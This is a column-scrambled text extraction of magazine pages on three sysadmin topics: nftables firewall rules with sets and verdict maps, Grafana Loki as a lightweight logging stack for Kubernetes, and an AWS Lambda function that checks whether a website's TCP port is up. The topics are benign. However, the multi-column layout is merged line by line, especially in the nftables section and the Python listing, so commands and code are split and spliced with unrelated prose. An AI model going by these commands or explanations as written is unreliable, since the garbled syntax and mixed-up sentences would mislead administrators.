ip daddr vmap { 10.1.0.2-10.1.0.10 : jump audit-chain, 10.1.1.2-10.1.1.10 : jump http-chain,
creates a chain named smtp-chain
192.168.0.2-192.168.0.10 : jump audit-chain, 192.168.1.2-192.168.1.10 : jump
that contains just a single rule with
http-chain }
a traffic counter pointing at the local
drop
SMTP port. From the existing incom-
}
ing chain, the system then jumps
chain audit-chain {
into this new chain, evaluates the
tcp dport 60 ip daddr @audit-servers
existing rule, and then continues
}
with the rules from the incoming base
chain http-chain {
chain. In this case, only the catch-all
tcp dport { http, https } ip daddr @http-servers
rule is evaluated, and all packets that
}
have not already been captured by
}
other rules are dropped:

nft add chain inet firewall smtp-chain nft add rule inet firewall incoming U other systems should be discarded
nft add rule inet firewall incoming U position 8 tcp dport { 25, 587 } U directly. For this, I create a new chain
position 8 tcp dport 25 U ip saddr @allow-smtp-set accept named forward in the kernel entry
ct state new jump smtp-chain point of the same name:
nft add rule inet firewall U In this case, a new rule is placed at
smtp-chain counter a defined point in the incoming chain nft create chain inet firewall forward { U
and uses the previously defined type filter hook forward priority 0\; }
Also important at this point is to allow-smtp-set to specify the sender
insert the jump rule at the correct posi- address. For the SMTP ports, on the The auditd-servers and httpd-servers
tion in the incoming chain; otherwise, other hand, an “anonymous set” is are each defined in a named set:
the rule would come after the drop used, which you can use directly in
catch-all statement and never be exe- a rule without having to define it be- nft add set inet firewall audit-servers { U
cuted. After the last changes, the new forehand. type ipv4_addr \; }
set of rules now looks like Listing 3. nft add element inet firewall U
The set is another new feature in Combining Functions audit-servers { 10.1.0.1, 192.168.0.1 }
nftables that lets you to merge ele- nft add set inet firewall http-servers { U
ments of a rule, such as an IP ad- The nice thing about nftables is that type ipv4_addr \; }
dress or port, into an array. You can many of the new functions can be nft add element inet firewall U
then use this array in the desired easily combined. Another function, http-servers { 10.1.1.1, 192.168.1.1 }
rule. The following example of a verdict maps demonstrates this very
named set assigns IP address ranges well. These maps are dictionaries that These named sets will be used in
to allow-smtp-set: use the structure of a named set as non-base chains, which I create in the
a key and non-base chains as a key next step:
nft add set inet firewall allow-smtp-set { U value if a match occurs. Although
type ipv4_addr\; flags interval\; } that might sound complicated, it is nft add chain inet firewall audit-chain
nft add element inet firewall allow-smtp- U actually quite simple. For the follow- nft add chain inet firewall http-chain
set { 10.1.0.0/24, 192.168.0.0/24 } ing example, the requirement is that
access to certain auditd and HTTPD Finally, the assignment takes place;
You can then access this named set in servers should only be possible from the target port for the HTTPD servers
any rule: certain IP addresses. Requests from is defined as the anonymous set:

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 57
S EC U R I T Y nftables

nft add rule inet firewall audit-chain U wiki [4], which also offers useful nft -f /tmp/ruleset.nft
tcp dport 60 ip daddr @audit-servers help for getting started with the new
nft add rule inet firewall http-chain tcp U packet filter; you might also want to then loads the converted rules into
dport { 80, 443 } ip daddr @http-servers bookmark the nftables reference [3]. the nftables framework.

Still missing is a way of controlling Converting from iptables Conclusions


the requests to the individual sys-
tems, which is done with the help of
Rules The Linux nftables packet filter
the verdict maps mentioned above. Finally, you should become acquainted framework offers a multitude of
Depending on the sender address, the with iptables-translate, a useful new features, improved perfor-
request is routed to the appropriate tool that lets you convert individual mance, and simplified operation
non-base chain: iptables commands, or even entire compared with previous packet fil-
iptables rulesets, into nft commands. ter implementations. Q
nft add rule inet firewall forward ip U For example, if you would rather enter
daddr vmap {U the nftables rule for accessing the SSH
10.1.0.2-10.1.0.10 : jump audit-chain, U server shown in iptables syntax at the Info
192.168.0.2-192.168.0.10 : U top of the article, you can see what the [1] nftables project: [https://netfilter.org/
jump audit-chain, U appropriate nft command would be: projects/nftables/]
10.1.1.1.2-10.1.1.10 : jump http-chain, U [2] Linux traffic control: [http://tldp.org/
192.168.1.2-192.168.1.10 : U iptables-translate -A INPUT -p tcp U HOWTO/Traffic-Control-HOWTO/intro.html]
jump http-chain U --dport 22 -m conntrack U [3] nftables matches: [https://wiki.nftables.
} --ctstate NEW -j ACCEPT org/wiki-nftables/index.php/Quick_refer-
nft add rule ip filter INPUT tcp U ence-nftables_in_10_minutes]
Finally, any further requests that do dport 22 ct state new counter accept [4] nftables wiki:[https://wiki.nftables.org/
not apply to any of the existing rules wiki-nftables/index.php/Main_Page]
are discarded: If you want to convert all your ipta-
bles rulesets from /etc/sysconfig/ipt- The Author
nft add rule inet firewall forward drop ables-save into nftables commands, Thorsten Scherf is a
use the command: Principal Consultant for
The whole ruleset then looks like Red Hat EMEA. You can
Listing 4. iptables-restore-translate U meet him as a speaker
The new Linux packet filter has many -f /etc/sysconfig/iptables-save > U at conferences. He is
more interesting features to offer, so /tmp/ruleset.nft also a keen marathon
you should refer to the very extensive runner whenever time
documentation in the nftables project Calling and his family permit.

58 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
M A N AG E M E N T Loki

Central logging for Kubernetes users

Shape Shifter
Grafana’s Loki is a good replacement candidate for the Elasticsearch, Logstash, and Kibana combination in
Kubernetes environments. By Martin Loschwitz

In conventional setups of the past, maintenance prove to be complex. A which functions are available and
admins had to troubleshoot fewer full-grown ELK cluster can massively which are missing.
nodes per setup and fewer technolo- consume resources, as well.
gies and protocols than is the case Unfortunately, you don’t have a lot The Roots of Loki:
today in the cloud, with its hundreds of alternatives. In the case of the
and thousands of technologies and popular competitor Splunk, a mere
Prometheus and Cortex
protocols for software-defined net- glance at the price list is bad for your If you follow Loki back to its roots, you
working, software-defined storage, blood pressure. However, the Grafana will come across some interesting de-
and solutions like OpenStack. In the developers are sending Loki [1] into tails: Loki is not a completely new de-
worst case, network nodes also need battle as a lean solution for central velopment; the Grafana developers ori-
to be checked separately. If you are logging, aimed primarily at Kuber- ented their work on Prometheus – but
searching for errors in this kind of netes users who are already using not directly. Loki was inspired by a Pro-
environment, you cannot put the re- Prometheus [2]. metheus fork named Cortex [3], which
quired logfiles together manually. Loki claims to avoid much of the extends the original Prometheus, add-
The Elasticsearch, Logstash, and overhead that is a fixed part of ELK. ing the horizontal scalability admins
Kibana (ELK) team has demonstrated In terms of functionality, the product often missed.
its ability to collect logs continuously can’t keep up with ELK, but most Prometheus itself has no scale-out
from affected systems, store them admins don’t need many features that story. Instead, the developers recom-
Lead Image © zlajo, 123RF.com

centrally, index the results, and thus bloat ELK in the first place. Unfor- mend running many instances in
make them searchable. However ELK tunately, ELK does not allow you to parallel and sharding the systems to
and its variations prove to be complex sacrifice part of the feature set for re- be monitored. Sending the incoming
beasts. Getting ELK up and running duced complexity. Loki from Grafana metric data to several Prometheus
is no mean achievement, and once opens up this door. In this article, I instances is intended to provide re-
it is finally running, operations and go into detail about Loki and describe dundancy in such a setup, but this

60 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Loki M A N AG E M E N T

construct forces you to tie different Different from ELK resources. Because Prometheus and
Prometheus instances to a single in- its Cortex fork are easy to configure
stance of the graphics drawing tool Loki attaches itself to these labels and dynamically, Loki is far better suited
Grafana, often with unsatisfactory uses them to index the incoming log for operation in containers, as well.
results. messages, which marks the biggest
Cortex removes this Prometheus architectural difference from ELK. Loki in Practice
design limitation but has not yet For this very reason, Loki is far more
achieved the widespread distribution efficient and lightweight: It does not Loki can be virtualized easily and
level and popularity of its ancestor. meticulously evaluate incoming log that was even one of the core require-
Clearly, it was well enough known messages and store them on the basis ments of the developers. Because
to the Grafana developers, because of defined rules and keywords; rather, Loki requires fewer resources than
in their search for a suitable tool for it works on the basis of the labels at- ELK, it does not need massive hard-
their project they used Cortex as a tached to them. ware resources. Like Prometheus,
starting point, which also explains What sounds complicated in theory Loki is a Go application, which you
the slogan the Loki developers use to is simple and comprehensible in can get from GitHub [1]. However,
advertise their product: Loki is “like practice. Suppose, for example, an in- it is not necessary to roll out and
Prometheus, but for logs.” stance of the Cluster Consensus Man- launch Loki as a Go binary. In the
ager Consul is running in a Kuber- best cloud style, the Loki developers
Log Entries as Metric Data netes environment and produces log offer Docker images of the solution
messages. If you rely on Prometheus on Docker Hub, so you can deploy
Both Prometheus and its derivative for monitoring, you will use this tool them locally straightaway. Therefore,
Cortex are tools for monitoring, alert- to monitor Consul on the hosts. the only external task is to send the
ing, and trending (MAT). However, One metric that Prometheus uses for configuration file to the container.
they cannot be compared with the Consul is consul_service_health_sta-
well-known monitoring tools such tus, but if you are running a develop- Under the Hood
as Icinga 2 or Nagios, which primar- ment instance and a production in-
ily focus on event-based monitoring. stance of the environment, you could What looks so easy at first glance re-
MAT systems, on the other hand, are define an Env label that can assume quires a combination of several com-
designed to collect as many perfor- the value dev or prod. With Grafana ponents on the inside. In the style of
mance metrics as possible from the linked to Prometheus, different a cloud-native application, Loki com-
computers to be monitored. graphs could then be drawn by label. prises several components that need
From this data, the applied load can Loki does something very similar by to interact to succeed. However, the
be read off and the future load can be classifying the stored log entries by architecture on which Loki is based is
estimated; monitoring is more or less label so you can display log entries not that specific to Loki. It simply re-
a waste product. If you know how for prod and dev. cycles large parts of the development
many instances of the httpd process Although not as convenient as the work already done for Cortex (Fig-
are running on a system, you can full-text search feature to which ELK ure 1). Because Cortex works well,
use a suitable component to raise an users are accustomed, the Loki solu- there’s no reason why Loki shouldn’t.
alert as soon as a value drops below tion is far more frugal in terms of Log data that reaches Loki is grabbed
a certain threshold. Loki’s radically
revolutionary approach now consists
of treating the log data of the target
systems exactly as if they were regu-
lar metric data.
If you have already set up a complete
Prometheus for an environment, you
will have dealt with labels, which are
useful in Prometheus to distinguish
between metrics. Admins typically
use labels for certain values: An
http_return_codes metric could have
a value label, which in turn takes
tags of 200, 403, 404, and so on. Ulti-
mately, labels help admins keep the
total number of all metrics reasonably
manageable, limiting the overhead Figure 1: Loki inherits much of its design from Cortex, which sees itself as a more scalable
needed for storage and processing. Prometheus. © Grafana

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 61
M A N AG E M E N T Loki

by the Distributor component; several briefly with the Ingesters to find log Where Do the Logs
instances of this service are usually entries that have not yet been moved
running. With large-scale systems, to storage. Otherwise, read and write
Originate?
the number of incoming log messages operations function completely inde- So far I have described how Loki
can quickly reach many millions pendently. works internally and how it stores
depending on the type of services and manages data. However, the
running in the cloud, so a single Scaling Works question of how log messages make
Distributor instance would hardly be their way to Loki has not yet been
sufficient. However, it would also be Looking at the overall Loki construct, clarified. This much is true: The
problematic to drop these incoming it becomes clear that the design of Prometheus Node Exporters are not
log messages into a database without the solution fits perfectly with the suitable here because they are tied
filtering and processing. If the data- requirements faced by the developers: to numeric metric data. Prometheus
base survived the onslaught, it would scalable, cost-effective with regard to itself does not have the ability to
inevitably become a bottleneck in the the required hardware, and as flexible process metric data other than num-
logging setup. as possible. bers, which is why the existing Pro-
The active instances of the Distribu- The index ends up with Cassandra, metheus exporters cannot handle log
tor therefore categorize the incom- Bigtable, or DynamoDB, all of which messages.
ing data into streams on the basis of are known to scale horizontally In the setup described here, the Loki
labels and forward them to Ingesters, without restrictions. The chunks are tool promtail attaches itself to existing
which are responsible for processing stored in an object store such as Ama- logging sources, records the details
the data. In concrete terms, process- zon S3, which also scales well. The there, and sends them to predefined
ing means forming log packages components belonging to Loki itself, instances of the Loki server. The
(chunks) from the incoming log mes- such as the Distributors and Queriers, “tail” in the name is no coincidence:
sages, which can be compressed by are stateless and therefore scale to Much like the tail Linux command,
Gzip. Like the Distributors, the sev- match requirements. it outputs the ends of logs in Pro-
eral Ingester instances also run at the Only the Ingester is a bit tricky. Un- metheus format.
same time, forming a ring architecture like its colleagues, it is a stateful During operation, you could also
over which a Distributor applies a application that simply must not let Promtail handle and manipulate
consistent hash algorithm to calculate fail. However, the implemented ring (rewrite) logfiles. Experienced Pro-
which of the Ingester instances is mechanism provides the features metheus jockeys will quickly notice
currently responsible for a particular required for sharding, so you can that Loki is fundamentally different
label. deploy any number of Ingesters to from Prometheus in one design as-
Once an Ingester has completed a suit needs. Loki scales horizontally pect: Whereas Prometheus collects
chunk of a log, the final step en route without limits. Because it does not its metric data from the monitoring
to central logging then follows: stor- store the contents of the incoming targets itself, Loki follows the push
ing the information in the storage log data, it has a noticeably smaller principle – the Promtail instances
system to which Loki is connected. hardware footprint than a comparable send their data to Loki.
As already mentioned, Loki differs ELK stack.
considerably from its predecessor The Loki documentation contains Graphics with Grafana
Prometheus, for which a time series detailed tips on scalability, but
database is a key aspect. briefly, to scale horizontally, Loki Because Loki comes from the Grafana
Loki, on the other hand, does not needs the Consul cluster consensus developers, the aggregated log data is
handle metrics, but text, so it stores mechanism to coordinate the work only displayed with this tool. Grafana
the chunks and information about steps beyond the borders of nodes. version 6.0 or newer offers the neces-
where they reside separately. The If you want to use Loki in this way, sary functions. The rest is simple:
index lists all known chunks of log it is a very good idea to read and Set up Loki as a data source as you
data, but the data packets themselves understand the corresponding docu- would for Prometheus. Grafana then
are located on the same storage facil- mentation, because a scaled Loki displays the corresponding entries.
ity configured for Loki. setup of this kind is far more com- The query language naturally has
What is interesting about the Loki ar- plex than a single instance. certain similarities in Loki and Cortex
chitecture is that it almost completely Loki is noticeably easier to imple- and therefore in Prometheus. Even
separates the read and write paths. ment than Prometheus, because Loki complex queries can be built. At the
If you want to read logs from Loki does not save the payload (i.e., the end of the day, Grafana turns out to
via Grafana, a third service is used log data) itself at the end. This task be a useful tool for displaying logs
in Loki, the Querier, which accesses is handled by external storage, which with the Loki back end. If you prefer
the index and stored chunks in the provides the high availability on a less graphical approach, the logcli
background. It also communicates which Loki relies. command-line tool is an option, too;

62 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Loki M A N AG E M E N T

as expected, however, it is not par- output by Kubernetes, processing all quired; then, you can integrate it into
ticularly convenient. labels that belong to the metric data Prometheus accordingly. The Loki
automatically. Operations Manual lists appropriate
Strong Duet Loki ultimately inherits all these ad- metrics.
vantages: If Loki is attached to an ex-
In principle, the team of Loki and isting Kubernetes Prometheus setup, No Multitenancy
Promtail can be used completely in- the same label rules can be recycled,
dependently of a container solution, making the setup easy to use. Finally, Loki also unfortunately in-
just like Prometheus. However, the herited a “feature” from Prometheus.
developers doubtlessly prefer to see Monitoring Loki The program does not support user
them used in combination with Ku- administration and therefore treats
bernetes, and indeed, the solution is The best solution for centralized log- all users that access it equally. Loki is
particularly well suited to Kubernetes. ging is useless if it is not available not usable for multitenancy. Instead,
On the one hand, Prometheus and in a crisis. The same applies if the you need to run one Loki instance per
Cortex have been very closely con- admin has forgotten to integrate im- tenant and secure it such that access
nected to Kubernetes from the very portant logfiles into the Loki cycle. by external intruders is not possible. Q
beginning – so far, in fact, that Pro- However, the Loki developers offer
metheus can attach itself directly support for both scenarios. A small
to the Kubernetes master servers to service named Loki Canary systemati- Info
find the list of systems to monitor cally searches systems for logfiles that [1] Loki: [https://github.com/grafana/loki/]
with fully automated node discov- Loki does not collect. [2] Prometheus: [https://github.com/
ery. Additionally, Prometheus is Both Loki and Promtail can even out- prometheus/prometheus]
perfectly capable of collecting, inter- put metric data about themselves via [3] Cortex:
preting, and storing the metric data their Prometheus interfaces, if so re- [https://github.com/cortexproject/cortex]
M A N AG E M E N T Serverless Uptime Monitoring

Serverless computing with AWS Lambda

Light Work
Monitoring with AWS Lambda serverless technology reduces costs and
scales to your infrastructure automatically. By Chris Binnie

For a number of reasons, it makes workload” in an efficient and cost- and have access to an account in which
sense to use today’s cloud-native in- effective manner [1]. you can test.
frastructure to run software without In this article, I show you how to
employing servers; instead, you can get started with AWS Lambda. Once Less Is More
use an arms-length, abstracted server- you’ve seen that external connectiv-
less platform such as AWS Lambda. ity is working, I’ll use a Python script As already mentioned, be warned
For example, when you create a to demonstrate how you might use a that Lambda function networking in
Lambda function (source code and a Lambda function to monitor a web- AWS has a few quirks. For example,
run-time configuration) and execute site all year round, without the need Internet Control Message Protocol
it, the AWS platform only bills you of ever running a server. (ICMP) traffic isn’t permitted for run-
for the execution time, also called For more advanced requirements, ning pings and other such network
the “compute time.” Simple tasks I’ll also touch on how to get the discovery services:
usually book only hundreds of mil- internal networking set up correctly Lambda attempts to impose as few
liseconds, as opposed to running an for a Lambda function to communi- restrictions as possible on normal lan-
Elastic Compute Cloud (EC2) server cate with nonpublic resources (e.g., guage and operating system activities,
instance all month long along with EC2 instances) hosted internally but there are a few activities that are
its associated costs. in AWS. Those Lambda functions disabled: Inbound network connec-
In addition to reducing the cost and will also be able to connect to the tions are blocked by AWS Lambda,
removing the often overlooked ad- Internet, which can be challenging and for outbound connections only
ministrative burden of maintaining to get right. TCP/IP sockets are supported, and
a fleet of servers to run your tasks, On an established AWS infrastructures, ptrace (debugging) system calls are
AWS Lambda also takes care of the most resources are usually segregated blocked. TCP port 25 traffic is also
sometimes difficult-to-get-right auto- into their own virtual private clouds blocked as an anti-spam measure.
Lead Image © joingate, 123RF.com

matic scaling of your infrastructure. (VPCs) for security and organizational Digging a little deeper …, the Lambda
With Lambda, AWS promises that you requirements, so I’ll look at the work- OS kernel lacks the CAP_NET_RAW
can sit back with your feet up and flow required to solve both internal and kernel capability to manipulate raw
rest assured that “your code runs in external connectivity headaches. I as- sockets.
parallel” and that the platform will be sume that you’re familiar with the ba- So, you can’t do ICMP or UDP from a
“scaling precisely with the size of the sics of the AWS Management Console Lambda function [2].

64 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Serverless Uptime Monitoring M A N AG E M E N T

(Be warned that this page is a little a DNS lookup. First, however, you assign an IAM profile, trimmed right
dated and things may have changed.) should create your function. Figure 1 down, by default: AWS wants you to
In other words, you’re not dealing shows the AWS Management Con- log in to CloudWatch to check the ex-
with the same networking stack that sole [3] Lambda service page with an ecution of your Lambda function.
you might find on a friendly Debian orange Create function button. The next screen in Figure 2 shows
box running in EC2. However, as I’ll If you’re wearing your reading the new function; you can see its
demonstrate in a moment, public Do- glasses, you might see that the name name in the Designer section and
main Name Service (DNS) lookups do of the function I’ve typed is internet- that it has Amazon CloudWatch
work as you’d hope, usually with the access-function. I’ve also chosen Py- Logs permissions by default. Fig-
use of the UDP protocol. thon 3.7 as the preferred run time. I ure 2 is only the top of a relatively
leave the default Author from scratch long page that includes the Designer
Less Said, The Better option alone at the top. options. Sometimes these options
For now, I ignore the execution role at are hidden and you need to expand
The way to prove that DNS lookups the bottom of the page and visit that them with the arrow next to the
work is, as you might have guessed, to again later, because the clever gubbins word Designer.
use a short script that simply performs behind the scenes will automatically Next, hide the Designer options by
clicking on the aforementioned ar-
row. After a little scrolling down,
you should see where you will paste
your function code (Figure 3). A
“Hello World” script, which I will
run as an example, is already in the
code area.
When I run the Hello World Lambda
function by clicking Test, I get a big,
green welcome box at the top of the
screen (I had to scroll up a bit), and
I can expand the details to show the
output,

{
Figure 1: The page where you will create a Lambda function. "statusCode": 200,
"body": "\"Hello from Lambda!\""
}

which means the test worked. If you


haven’t created a test event yet, you’ll
see a pop-up dialog box the first time
you run a test, and you’ll be asked to
add an Event Name.
If you do that now, you can just leave
the default key1 and other informa-
tion in place. You don’t need to
change these values just yet, because,
to execute both the Hello World and
Figure 2: A new Lambda function. the DNS lookup script, you don’t
need to pass any variables to your
Lambda function from here. I called
my Event Name EmptyTest and then
clicked the orange Create button at
the bottom.
Next, I’ll paste the DNS Python
lookup script

import socket

Figure 3: Your Lambda function code will go here in place of the Hello World example. def lambda_handler(event, context):

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 65
M A N AG E M E N T Serverless Uptime Monitoring

Listing 1: DNS Lookup Output data = socket.gethostbyname_ex(U your script is correct), simply click
'www.devsecops.cc') the Test button again; you should get
START RequestId:
4e90b424-95d9-4453-a2f4-8f5259f5f263 Version: $LATEST print (data) another green success bar at the top
('www.devsecops.cc', [], [' 138.68.149.181' ]) return of the screen.
END RequestId: 4e90b424-95d9-4453-a2f4-8f5259f5f263 The green bar will show null, be-
REPORT RequestId: 4e90b424-95d9-4453-a2f4-8f5259f5f263 over the top of the Hello World exam- cause the script doesn’t actually
Duration: 70.72 ms ple and click the orange Save button output anything. However, if you
Billed Duration: 100 ms at the top. look in the Log Output section, you
Memory Size: 128 MB To run the function as it stands (using can see some output (Listing 1),
Max Memory Used: 55 MB
only the default configuration options with the IP address next to the DNS
Init Duration: 129.20 ms
and making sure the indentation in name you looked up.

Listing 2: handler.py
001 import json 048 def reportbody(self):
002 import os 049 return self.__get_property(self.REPORT_RESPONSE_BODY)
003 import boto3 050
004 from time import perf_counter as pc 051 @property
005 import socket 052 def cwoptions(self):
006 053 return {
007 class Config: 054 'enabled': self.__get_property(self.REPORT_AS_CW_METRICS),
008 """Lambda function runtime configuration""" 055 'namespace':
009 self.__get_property(self.CW_METRICS_NAMESPACE),
010 HOSTNAME = 'HOSTNAME' 056 }
011 PORT = 'PORT' 057
012 TIMEOUT = 'TIMEOUT' 058 class PortCheck:
013 REPORT_AS_CW_METRICS = 'REPORT_AS_CW_METRICS' 059 """Execution of HTTP(s) request"""
014 CW_METRICS_NAMESPACE = 'CW_METRICS_NAMESPACE' 060
015 061 def __init__(self, config):
016 def __init__(self, event): 062 self.config = config
017 self.event = event 063
018 self.defaults = { 064 def execute(self):
019 self.HOSTNAME: 'google.com.au', 065 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
020 self.PORT: 443, 066 sock.settimeout(int(self.config.timeout))
021 self.TIMEOUT: 120, 067 try:
022 self.REPORT_AS_CW_METRICS: '1', 068 # start the stopwatch
023 self.CW_METRICS_NAMESPACE: 'TcpPortCheck', 069 t0 = pc()
024 } 070
025 071 connect_result = sock.connect_ex
026 def __get_property(self, property_name): ((self.config.hostname, int(self.config.port)))
027 if property_name in self.event: 072 if connect_result == 0:
028 return self.event[property_name] 073 available = '1'
029 if property_name in os.environ: 074 else:
030 return os.environ[property_name] 075 available = '0'
031 if property_name in self.defaults: 076
032 return self.defaults[property_name] 077 # stop the stopwatch
033 return None 078 t1 = pc()
034 079
035 @property 080 result = {
036 def hostname(self): 081 'TimeTaken': int((t1 - t0) * 1000),
037 return self.__get_property(self.HOSTNAME) 082 'Available': available
038 083 }
039 @property 084 print(f"Socket connect result: {connect_result}")
040 def port(self): 085 # return structure with data
041 return self.__get_property(self.PORT) 086 return result
042 087 except Exception as e:
043 @property 088 print(f"Failed to connect to {self.config.hostname}:{self.
044 def timeout(self): config.port}\n{e}")
045 return self.__get_property(self.TIMEOUT) 089 return {'Available': 0, 'Reason': str(e)}
046 090
047 @property 091 class ResultReporter:

66 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Serverless Uptime Monitoring M A N AG E M E N T

Listing 2: handler.py (Continued)


092 """Reporting results to CloudWatch""" 120
093 121 result = cloudwatch.put_metric_data(
094 def __init__(self, config): 122 MetricData=metric_data,
095 self.config = config 123 Namespace=self.config.cwoptions['namespace']
096 self.options = config.cwoptions 124 )
097 125
098 def report(self, result): 126 print(f"Sent data to CloudWatch requestId=:{result['Re
099 if self.options['enabled'] == '1': sponseMetadata']['RequestId']}")
100 try: 127 except Exception as e:
101 endpoint = f"{self.config.hostname}:{s elf.config. 128 print(f"Failed to publish metrics to CloudWatch:{e}")
port}" 129
102 cloudwatch = boto3.client('cloudwatch') 130 def port_check(event, context):
103 metric_data = [{ 131 """Lambda function handler"""
104 'MetricName': 'Available', 132
105 'Dimensions': [ 133 config = Config(event)
106 {'Name': 'Endpoint', 'Value': endpoint} 134 port_check = PortCheck(config)
107 ], 135
108 'Unit': 'None', 136 result = port_check.execute()
109 'Value': int(result['Available']) 137
110 }] 138 # report results
111 if result['Available'] == '1': 139 ResultReporter(config).report(result)
112 metric_data.append({ 140
113 'MetricName': 'TimeTaken', 141 result_json = json.dumps(result, indent=4)
114 'Dimensions': [ 142 # log results
115 {'Name': 'Endpoint', 'Value': endpoint} 143 print(f"Result of checking {config.hostname}:{config.port}\
116 ], n{result_json}")
117 'Unit': 'Milliseconds', 144
118 'Value': int(result['TimeTaken']) 145 # return to caller
119 }) 146 return result

More or Less { "Available": "1"


"HOSTNAME":"www.devsecops.cc", }
For the second Lambda task, you’ll "PORT":"443",
use a more sophisticated script that "TIMEOUT":5 To make sure it’s working, alter your
will allow you to monitor a website. } test event to a funny port number on
The script for the Lambda function, which your destination definitely isn’t
with the kind permission of the peo- adjusted a bit from the base2Services listening (e.g., TCP port 4444) and
ple behind the base2Services GitHub GitHub example [5]. Once you’ve see what happens. If you get a 0 for
page [4], will attempt to perform a adapted the parameters for your own Available, you know the test is work-
two-way remote TCP port connection. system settings, go back to the Emp- ing as hoped.
Copy the handler.py script (Listing 2) tyTest box, pull down the menu, and Incidentally, you can ignore the
and paste it into the function tab, as click Configure test events to create CloudWatch errors if you notice
before. If you can’t copy the Python a new parameter to pass to a test. I them. In Listing 3 you can see
script easily, then click the Raw op- pasted the test event code over the the CloudWatch IAM policy auto-
tion on the right side of the page and top of the example JSON code, named generated when you create the
copy all of the raw text. it PortTest, and clicked Create. Lambda function. By default, it’s
Now, click Save at the top right trimmed down and will cause a
and look for the Handler input box More Haste, Less Speed relatively trivial CloudWatch met-
on the right-hand side of where rics error, because it doesn’t have
you pasted the code. You’ll need Now you can click the Test button to a cloudwatch:PutMetricData permis-
to change the starting point for the see if you can connect to the Internet sion, which the script would need.
Lambda function from lambda_func- over TCP port 443. Success is denoted
tion.lambda_handler to lambda_ this time if the output in the green Completely Hopeless
function.port_check, which is how bar at the top of the page shows:
the script is written. Be sure to click Now that your monitoring Lambda
Save again. { function is working, you can schedule
Next, configure a new test event, "TimeTaken": 187, it to run periodically to monitor a

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 67
M A N AG E M E N T Serverless Uptime Monitoring

Listing 3: CloudWatch IAM Policy


01 {
02 "Version": "2012-10-17",
03 "Statement": [
04 {
05 "Effect": "Allow",
06 "Action": "logs:CreateLogGroup",
07 "Resource": "arn:aws:logs:eu-west-1:XXXXXXX:*"
08 },
09 {
10 "Effect": "Allow",
11 "Action": [
12 "logs:CreateLogStream",
13 "logs:PutLogEvents"
14 ],
15 "Resource": [
16 "arn:aws:logs:eu-west-1:XXXXXX:log-group:
/aws/lambda/internet-access-function:*"
17 ]
Figure 4: Setting up a schedule for a Lambda function in CloudWatch.
18 }
19 ]
run-time parameters of the Cloud- Having saved that change, you can
20 }
Watch rule with relative ease. To do now see in your CloudWatch log
so, select your Lambda function and (Figure 6) that the Lambda function
website by using CloudWatch in AWS. copy the PortCheck test event you cre- is indeed checking the correct web-
In the CloudWatch section in the ated as JSON earlier and simply add site and logging its output for future
AWS Management Console, start this to your rule. reference.
with Events | Rules and choose the Where do you paste it, you may well Now that you can see the intended
Schedule radio button (Figure 4). ask? Look inside your CloudWatch website, you can alter your rule’s
In the Targets section you want to rule config and tick Constant (JSON schedule to monitor its uptime every
select Lambda function in the drop- text) under the Configure input drop- minute or every day – or, in fact, what-
down and then select the name of down options and then paste in the ever time period you desire. You can
your function (i.e., internet-access- content used previously: even use a cron format, if you prefer.
function). If you want to go a step further,
Next, click the blue Configure details { you can also create metrics for your
button, add a name for the rule, and "HOSTNAME":"www.devsecops.cc", CloudWatch rule and create a Simple
then click the blue Create rule but- "PORT":"443", Notification Service (SNS) topic so
ton. Make sure the name doesn’t "TIMEOUT":5 that email alarms are triggered when
contain spaces. To continue, click } the website is unavailable. That part
on Logs on the left-hand side; then,
choose your Lambda function name,
which in turn will reveal the log for
each execution.
The top log entry offers some bad
news (Figure 5). As you can see, the
Lambda function’s script defaults
to Google in Australia (where the
authors of the script reside), so you Figure 5: To monitor the desired website, you need to adjust the input parameters of your
need to add your test event param- CloudWatch rule.
eters into the CloudWatch rule. If the
PutMetrics error is jumping out at
you, then you can either adjust your
IAM permissions, remove it from
the Lambda function’s script, or, of
course, just ignore it.
Fear not, however. If you go back into
the configuration, you can adjust the Figure 6: Happiness is probing the correct website address.

68 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Serverless Uptime Monitoring M A N AG E M E N T

of the jigsaw puzzle is relatively inside a VPC so that they can access I could be forgiven for summarizing it
easy to pick up if you haven’t done nonpublic resources securely, as well in one sentence: “To access resources
it before. Remember to disable the as the Internet. Table 1 shows the inside a VPC, use a private subnet and
CloudWatch rule once you’ve finished workflow involved. a NAT gateway and then connect that
testing to avoid the potential of an A minor caveat is that if you’re test- to a public subnet, which by inference
email storm. ing against existing networking that has an Internet gateway attached for
Now that you have a shiny new is already running important services, external Internet access.”
working Lambda function that can be it’s possible to tie yourself in knots I’ve had success with the above ap-
scheduled to run whenever you like, and break things horribly. proach, so bear this workflow in
I’ll spend a moment looking at what To get started, try to create, where mind for future reference if you fore-
a more complex workflow might look possible, these new resources inside a see a need.
like if you were running your Lambda new VPC for testing purposes. Some
function inside a VPC. of the resources should definitely be Endless
deleted afterward – especially the
Don’t Be Careless Elastic Network Interface (ENI) – to No doubt you’ll be using serverless
save ongoing costs for Elastic IP ad- technologies more and more in the
At the beginning of this article, I men- dresses. Consider yourself suitably future. However, a few gotchas that
tioned that Internet access is trickier warned! introduce security risks still need some
if you have a more mature infrastruc- If you are familiar with the innards of attention. Sadly, they don’t magically
ture and host your Lambda functions AWS and have looked through Table 1, disappear when using an abstracted
platform, as some would hope. That
Table 1: Workflow for VPCs said, I hope you can see the benefits
Step Action Required of such abstraction, in terms of opera-
1 Check your VPC configuration and create a new one if needed. tional overhead and running costs. It’s
2 Create a private subnet specifically for your Lambda function, so you can isolate your
safe to say that with some basic script-
other services from potential security risks. ing skills, serverless technology makes
3 Create a public subnet in your VPC if one doesn’t exist. light work of numerous tasks. Q

4 Ensure an Internet gateway is present in the public subnet, and adjust your routing
table for outbound traffic to point at 0.0.0.0/0.
Info
5 Point your private subnet’s NAT gateway at the public subnet and point all traffic
(0.0.0.0/0) to the NAT gateway. [1] AWS Lambda:
[https://aws.amazon.com/lambda]
6 Create or adjust a security group for your network rules, “self referencing” the secu-
